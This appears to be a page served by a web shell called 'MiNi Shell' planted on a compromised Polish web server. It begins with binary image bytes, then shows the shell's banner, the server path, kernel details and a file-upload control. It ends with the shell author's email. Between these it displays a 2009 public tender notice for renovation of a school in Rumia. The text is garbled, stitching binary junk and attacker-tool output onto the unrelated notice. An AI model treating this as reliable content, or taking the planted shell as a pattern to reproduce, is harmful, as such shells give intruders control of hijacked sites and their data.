JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090129/11360-N-2009.html

<p class="kh_header"><b>Rumia: Oferta na przetarg nieograniczony na wykonanie robót remontowo-budowlanych w pomieszczeniach Gimnazjum Nr 4</b><br>
<b>Numer ogłoszenia: 11360 - 2009; data zamieszczenia: 29.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gimnazjum Nr 4 im. Karola Wojtyły , ul. Batorego 29, 84-230 Rumia, woj. pomorskie, tel. 0-58 671 01 40, faks 0-58 671 01 40.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Placówka oświatowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oferta na przetarg nieograniczony na wykonanie robót remontowo-budowlanych w pomieszczeniach Gimnazjum Nr 4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie robót remontowo-budowlanych w pomieszczeniach Gimnazjum Nr 4 im. Karola Wojtyły w Rumi, 84-230 Rumia ul. Batorego 29.                            Zakres prac obejmuje wykonanie następujących robót:

       Parter  - Sala lekcyjna nr 1.11
       Roboty malarskie:
        -  przygotowanie powierzchni do malowania (zeskrobanie i zmycie starych farb,                                             zagruntowanie - wzmocnienie podłoża emulsją gruntującą Atlas - Unigrunt,                       szpachlowanie dwukrotne sufitów i ścian  Cekolem)
         - malowanie dwukrotne farbą emulsyjną akrylową sufitów i ścian
         - malowanie dwukrotne z dwukrotnym szpachlowaniem farbą olejną  lamperii
         - malowanie farbą olejną rur instalacyjnych
       Roboty posadzkowe:
- zerwanie posadzki z płytek PCV wraz z listwami
- usunięcie starego kleju z podłoża
- wylewka samopoziomująca pod wykładzinę
- ułożenie wykładziny Tarket  z wywinięciem na ścianę na wys. 7cm

Parter - Sala lekcyjna Nr 1.19
Roboty malarskie i posadzkarskie jak sala nr 1.19
Wymiana grzejników:
- demontaż istniejących grzejników
- montaż nowych grzejników 3-płytowych z kompletem zawieszeń
- wymiana zaworów termostatycznych z głowicą typu Danfos

Piętro - Sala lekcyjna Nr 2.9
Roboty malarskie i posadzkowe jak sala Nr 1.19

Wymiana stolarki drzwiowej do 6-ciu  sal lekcyjnych
- demontaż istniejącej stolarki drzwiowej
- montaż nowych drzwi drewnianych profilowanych, pełnych,  w komplecie                           z   ościeżnicą drewnianą i okuciami
- obróbka obsadzenia drzwi, z naprawą tynków i malowania ścian


Parter wc nauczycieli
Roboty rozbiórkowe
- demontaż istniejących okładzin ściennych i posadzkowych
- rozbiórka komina wentylacyjnego
- demontaż naświetla z zamurowaniem otworu
- demontaż istniejącej stolarki drzwiowej
Roboty budowlane wykończeniowe
- przygotowanie podłoża pod okładziny ścienne i posadzkowe
- układanie glazury i terakoty
- przygotowanie sufitu do malowania (zeskrobanie i zmycie starej farby,   gruntowanie   podłoża, dwukrotne szpachlowanie Cekowem)
- malowanie dwukrotne farbą emulsyjną akrylową
- montaż stolarki drzwiowej pełnej, profilowanej z ościeżnicą drewnianą oraz    kompletem okuć
Roboty sanitarne
- wymiana urządzeń sanitarnych (wc, umywalka, bateria umywalkowa)
- wymiana podejść dopływowych i odpływowych do urządzeń sanitarnych
- przeróbka odpowietrzenia pionu kanalizacyjnego ze schowaniem w ścianę
- wymiana wyposażenia wc (dozownik mydła, pojemnik na papier toaletowy,    suszarka   do rąk, lustro)
- montaż wentylatora łazienkowego zsynchronizowanego z wyłącznikiem światła
Roboty elektryczne
- wymiana oprawy oświetleniowej z przeniesieniem ze ściany na sufit
- wymiana wyłącznika
- wymiana przewodów elektrycznych
- badania i pomiary instalacji elektrycznej

Parter - pomieszczenie kuchni
Roboty rozbiórkowe
- rozbiórka istniejących okładzin ściennych i posadzkowych (glazura, płytki lastryko)
- demontaż stolarki drzwiowej (wejście do kuchni i do magazynu przy kuchni)
Roboty budowlane wykończeniowe
- przygotowanie podłoża pod malowanie - sufit (zeskrobanie i zmycie starej farby,   gruntowanie, szpachlowanie dwukrotne Cekolem)
- malowanie sufitu farbą emulsyjną akrylową
- przygotowanie powierzchni ścian pod glazurę, układanie glazury na ścianach
- przygotowanie posadzki pod płytki gres, z wykonaniem spadków
- układanie płytek gres antypoślizgowych
- zabudowa okapu płytą g - k wodo i ognioodporną na ruszcie metalowym,   dwuwarstwowo, płyty g - k gr. 12,5mm
- montaż nowych drzwi drewnianych profilowanych do magazynu kuchni i    wejściowych do kuchni z okienkiem podawczym
Roboty sanitarne
- przełożenie instalacji wody - schowanie rur w ścianę
- wymiana baterii zmywakowych szt   2 oraz podejść odpływowych i dopływowych do    zmywaków, 
Roboty elektryczne
- wymiana opraw oświetleniowych szt  2
- wymiana wyłączników hermetycznych
- wymiana gniazd wtyczkowych hermetycznych szt 4
- wymiana gniazd siłowych 16A - szt  2
- wymiana przewodów instalacji elektrycznej
- badania i pomiary instalacji elektrycznej

Parter - korytarz kuchni
Roboty rozbiórkowe
- demontaż istniejącej stolarki drzwiowej - szt 4
Roboty elektryczne
- wymiana oprawy oświetleniowej oraz wyłącznika
- wymiana przewodów instalacji elektrycznej
- badania i pomiary instalacji elektrycznej
Roboty instalacyjne - przeróbka instalacji wodnej (schowanie rur w ścianę)
Roboty budowlane wykończeniowe
- przygotowanie sufitu do malowania (zeskrobanie i zmycie starej farby,   gruntowanie,   szpachlowanie dwukrotne Cekolem) 
- malowanie dwukrotne  farbą emulsyjną akrylową 
- przygotowanie powierzchni pod glazurę i terakotę
- układanie glazury i terakoty
- montaż stolarki drzwiowej drewnianej w komplecie z ościeżnicą i okuciami - kpl 4

Wywóz materiałów rozbiórkowych na wysypisko śmieci oraz opłata za ich utylizację. 

2.	Zamawiający nie dopuszcza składanie ofert częściowych.
3.	Zamawiający nie dopuszcza składanie ofert wariantowych.
4.	Zamawiający nie przewiduje zaistnienia zamówień uzupełniających do zamówienia podstawowego. 
5.	Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
              1) posiadają uprawnienia do wykonywania określonej działalności w zakresie wykonawstwa  
         robót budowlanych objętych zamówieniem, 
                    2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
           i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie 
           innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
           zamówienia, w szczególności: 
                          a) wykażą wykonanie min. 2 robót budowlanych polegających na wykonaniu robót remontowych w obiektów użyteczności publicznej, o wartości  minimum 50.000 zł. (brutto), każdej               z wykonanych robót.  
                     3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
                     4)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, 
5)	udzielą gwarancji na wykonane prace na okres nie krótszy niż 36 m-cy,   
                     6)  spełnią pozostałe wymagania SIWZ. 

2.	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie  
      przedłożonych oświadczeń i dokumentów opisanych w Rozdziale IV SIWZ, według formuły  
      spełnia/niespełna.

1.	Przy wyborze ofert zamawiający kierować się będzie następującymi kryteriami:
Cena - 100% 
2.	Maksymalną ilość punktów za *cenę* otrzyma wykonawca proponujący najniższą cenę brutto zamówienia. Punkty będą liczone wg wzoru:
C=Cn:Co*100
	        Cn- najniższa zaoferowana cena, Co- cena rozpatrywanej oferty, 
	     C- ilość punktów którą otrzyma badana oferta
     
     Wynik będzie traktowany jako wartość punktowa.
3.	 W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert. 
4.	Zamawiający poprawi w tekście oferty:
1)	 oczywiste omyłki pisarskie;
2)	 oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek;
3)	inne omyłki polegające na niezgodności oferty ze specyfikacją istotnych warunków zamówienia, niepowodujących istotnych zmian w treści oferty
     - niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.

5. Zamawiający poprawi omyłki rachunkowe w obliczeniu ceny w następujący sposób:
      1)   w przypadku mnożenia cen jednostkowych i liczby jednostek miar:
a)	jeżeli obliczona cena nie odpowiada iloczynowi ceny jednostkowej oraz liczby jednostek miar przyjmuje się, że prawidłowo podano liczbę jednostek miar oraz cenę jednostkową,
b)	jeżeli cenę jednostkową podano rozbieżnie słownie i liczbą przyjmuje się, że prawidłowo podano liczbę jednostek miar i ten zapis ceny jednostkowej, który odpowiada dokonanemu obliczeniu ceny;
2)	w przypadku sumowania cen za poszczególne części zamówienia:
a)	jeżeli obliczona cena nie odpowiada sumie cen za części zamówienia przyjmuje się, że prawidłowo podano ceny za części zamówienia,
b)	jeżeli cenę za część zamówienia podano rozbieżnie słownie i liczbą, przyjmuje się, że prawidłowo podano ten zapis, który odpowiada dokonanemu obliczeniu ceny,
c)	jeżeli ani cena za część zamówienia podana liczbą, ani podana słownie nie odpowiadają obliczonej cenie przyjmuje się, że prawidłowo podano ceny za część zamówienia wyrażone słownie;
3)	w przypadku oferty z ceną określoną za cały przedmiot zamówienia albo jego część (cena ryczałtowa):
a)	przyjmuje się, że prawidłowo podano cenę ryczałtową bez względu na sposób jej obliczenia,
b)	jeżeli cena ryczałtowa podana liczbą nie odpowiada cenie ryczałtowej podanej słownie, przyjmuje się za prawidłową cenę ryczałtową podaną słownie,
c)	jeżeli obliczona cena nie odpowiada sumie cen ryczałtowych przyjmuje się, że prawidłowo podano poszczególne ceny ryczałtowe.

6.  W przypadku wątpliwości Zamawiający w celu ustalenia, czy oferta zawiera rażąco niską cenę
      w stosunku do przedmiotu zamówienia, zwróci się w formie pisemnej do Wykonawcy o 
      udzielenie w określonym terminie wyjaśnień dotyczących elementów oferty mających wpływ na 
      wysokość ceny.
7.	Jeżeli w postępowaniu o udzielenie zamówienia, w którym jedynym kryterium oceny ofert jest cena, nie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.
8.	Zamawiający udzieli zamówienia wykonawcy, którego oferta:
a.	Odpowiada wymaganiom określonym w Pzp.
b.	Odpowiada wszystkim wymaganiom zawartym w SIWZ.
c.	Zawiera najkorzystniejszą cenę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla udokumentowania spełnienia wymaganych warunków oraz uznania formalnej poprawności, oferta musi zawierać następujące oświadczenia i dokumenty:
A. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp składa następujące dokumenty:
1.	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy pzp oraz oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 pzp.;
2.	Pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik; 
3.	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; W przypadku gdy wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości;
    4.  Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w postępowaniu,  

   Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed dniem składania ofert.     

          Warunki wyżej wymienione mają zastosowanie do wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia.

B. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i  
  doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania 
  zamówienia należy złożyć następujące dokumenty lub pisemnych zobowiązań 
  innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
  zamówienia:
                    1) wykaz osób którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć 
                        w wykonywaniu zamówienia, wraz z  informacjami na temat ich kwalifikacji zawodowych, 
doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu 
 wykonywanych przez nich czynności . 
                      2) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 1, Wykonawca wskazał osoby, którymi będzie dysponował;

                       3) wykaz wykonanych w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania  o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. 2 robót budowlanych polegających na wykonaniu robót remontowych w obiektach użyteczności publicznej, o wartości każdej z nich minimum 50.000 zł brutto,                   z podaniem ich wartości oraz daty i miejsca wykonania   oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.

Warunki wymienione w części IV B wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełniają łącznie.

C. W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
-	polisę, a w przypadku jej braku inny dokument potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. Suma gwarancyjna w zakresie prowadzonych robót (kontraktowa) oraz szkód rzeczowo-finansowych (deliktowa) nie może być niższa niż 30.000,00 zł.  

Warunki wymienione w części IV C wykonawcy wspólnie ubiegających się o udzielenie zamówienia spełniają łącznie. 

D. Inne dokumenty i oświadczenia:
1)  wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1;
3) szczegółowy kosztorys ofertowy - sporządzony na podstawie przedmiaru robót,        uwzględniający wszystkie koszty konieczne do wykonania zadania.
       Kosztorys ofertowy powinien zawierać: stronę tytułową, tabelę elementów, kalkulację        kosztową, zestawienie robocizny, materiałów i sprzętu. 

Warunki wymienione w części IV D wykonawcy wspólnie ubiegających się o udzielenie zamówienia spełniają łącznie. 

E. Dokumenty wymagane w przypadku składania oferty wspólnej: 
  - Oferta winna zawierać: oświadczenia i dokumenty opisane w tekście w części IV 
     A, B, C i D z zastrzeżeniem uwag do części A..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gimnazjum4.rumia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.gimnazjum4.rumia.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2009 godzina 12:30, miejsce: Gimnazjum Nr 4 im. Karola Wojtyły w Rumi, 84-230 Rumia ul. Batorego 29
    Pokój nr 16 - sekretariat Szkoły.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com